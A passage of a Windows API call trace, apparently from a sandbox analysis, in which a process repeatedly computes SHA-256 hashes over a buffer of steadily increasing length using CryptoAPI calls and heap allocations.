	[0225.015] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x720, dwFlags=0x0) returned 1
	[0225.015] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.015] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27796a8
	[0225.015] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x27796a8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27796a8, pdwDataLen=0x128ba4) returned 1
	[0225.015] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.015] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.015] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.016] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.016] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x740, dwFlags=0x0) returned 1
	[0225.016] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.016] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27796d0
	[0225.016] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27796d0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27796d0, pdwDataLen=0x128ba4) returned 1
	[0225.016] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.016] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.016] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.016] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.016] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x760, dwFlags=0x0) returned 1
	[0225.016] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.016] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27796f8
	[0225.016] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x27796f8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27796f8, pdwDataLen=0x128ba4) returned 1
	[0225.016] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.016] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.016] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.017] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.017] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x780, dwFlags=0x0) returned 1
	[0225.017] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.017] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779720
	[0225.017] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2779720, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779720, pdwDataLen=0x128ba4) returned 1
	[0225.017] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.017] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.017] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.017] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.017] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x7a0, dwFlags=0x0) returned 1
	[0225.017] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.017] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779748
	[0225.017] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2779748, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779748, pdwDataLen=0x128ba4) returned 1
	[0225.017] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.017] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.017] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.018] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.018] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x7c0, dwFlags=0x0) returned 1
	[0225.018] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.018] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779770
	[0225.018] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2779770, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779770, pdwDataLen=0x128ba4) returned 1
	[0225.018] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.018] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.018] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.018] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.018] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x7e0, dwFlags=0x0) returned 1
	[0225.018] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.018] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779798
	[0225.018] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2779798, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779798, pdwDataLen=0x128ba4) returned 1
	[0225.019] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.019] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.019] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.019] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.019] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x800, dwFlags=0x0) returned 1
	[0225.019] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.019] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27797c0
	[0225.019] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27797c0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27797c0, pdwDataLen=0x128ba4) returned 1
	[0225.019] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.019] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.019] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.019] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.019] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x820, dwFlags=0x0) returned 1
	[0225.019] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.019] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27797e8
	[0225.019] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x27797e8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27797e8, pdwDataLen=0x128ba4) returned 1
	[0225.020] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.020] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.020] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.020] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.020] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x840, dwFlags=0x0) returned 1
	[0225.020] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.020] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779810
	[0225.020] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2779810, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779810, pdwDataLen=0x128ba4) returned 1
	[0225.020] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.020] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.020] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.020] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.020] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x860, dwFlags=0x0) returned 1
	[0225.020] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.020] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779838
	[0225.020] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2779838, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779838, pdwDataLen=0x128ba4) returned 1
	[0225.021] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.021] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.021] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.021] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.021] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x880, dwFlags=0x0) returned 1
	[0225.021] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.021] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779860
	[0225.021] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2779860, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779860, pdwDataLen=0x128ba4) returned 1
	[0225.021] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.021] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.021] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.021] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.021] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x8a0, dwFlags=0x0) returned 1
	[0225.021] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.021] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779888
	[0225.021] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2779888, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779888, pdwDataLen=0x128ba4) returned 1
	[0225.022] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.022] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.022] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.022] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.022] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x8c0, dwFlags=0x0) returned 1
	[0225.022] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.022] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27798b0
	[0225.022] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27798b0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27798b0, pdwDataLen=0x128ba4) returned 1
	[0225.022] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.022] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.022] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.022] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.022] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x8e0, dwFlags=0x0) returned 1
	[0225.022] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.022] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27798d8
	[0225.022] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x27798d8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27798d8, pdwDataLen=0x128ba4) returned 1
	[0225.023] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.023] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.023] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.023] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.023] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x900, dwFlags=0x0) returned 1
	[0225.023] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.023] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779900
	[0225.023] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2779900, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779900, pdwDataLen=0x128ba4) returned 1
	[0225.023] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.023] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.023] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.023] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.024] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x920, dwFlags=0x0) returned 1
	[0225.024] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.024] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779928
	[0225.024] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2779928, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779928, pdwDataLen=0x128ba4) returned 1
	[0225.024] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.024] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.024] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.024] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.024] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x940, dwFlags=0x0) returned 1
	[0225.024] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.024] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779950
	[0225.024] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2779950, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779950, pdwDataLen=0x128ba4) returned 1
	[0225.024] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.024] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.024] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.025] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.025] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x960, dwFlags=0x0) returned 1
	[0225.025] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.025] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779978
	[0225.025] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2779978, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779978, pdwDataLen=0x128ba4) returned 1
	[0225.025] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.025] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.025] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.025] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.025] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x980, dwFlags=0x0) returned 1
	[0225.025] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.025] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27799a0
	[0225.025] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27799a0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27799a0, pdwDataLen=0x128ba4) returned 1
	[0225.025] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.025] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.025] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.026] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.026] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x9a0, dwFlags=0x0) returned 1
	[0225.026] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.026] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27799c8
	[0225.026] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x27799c8, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27799c8, pdwDataLen=0x128ba4) returned 1
	[0225.026] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.026] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.026] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.026] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.026] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0x9c0, dwFlags=0x0) returned 1
	[0225.026] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.026] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27799f0
	[0225.026] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x27799f0, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x27799f0, pdwDataLen=0x128ba4) returned 1
	[0225.026] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.026] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.026] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.027] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.027] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0x9e0, dwFlags=0x0) returned 1
	[0225.027] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.027] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779a18
	[0225.027] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2779a18, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779a18, pdwDataLen=0x128ba4) returned 1
	[0225.027] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.027] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.027] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.027] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.027] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0xa00, dwFlags=0x0) returned 1
	[0225.027] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.027] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779a40
	[0225.027] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2779a40, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779a40, pdwDataLen=0x128ba4) returned 1
	[0225.027] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0225.027] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.027] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.028] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.028] CryptHashData (hHash=0x22b6600, pbData=0x2764c60, dwDataLen=0xa20, dwFlags=0x0) returned 1
	[0225.028] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
	[0225.028] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2779a68
	[0225.028] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2779a68, pdwDataLen=0x128ba4, dwFlags=0x0 | out: pbData=0x2779a68, pdwDataLen=0x128ba4) returned 1
	[0225.028] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0225.028] CryptReleaseContext (hProv=0x225d20, dwFlags=0x0) returned 1
	[0225.028] CryptAcquireContextW (in: phProv=0x128ba8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x128ba8*=0x225d20) returned 1
	[0225.028] CryptCreateHash (in: hProv=0x225d20, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x128bac | out: phHash=0x128bac) returned 1
	[0225.028] CryptHashData (hHash=0x22b6940, pbData=0x2764c60, dwDataLen=0xa40, dwFlags=0x0) returned 1
	[0225.028] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x128ba4, pdwDataLen=0x128ba0, dwFlags=0x0 | out: pbData=0x128ba4, pdwDataLen=0x128ba0) returned 1
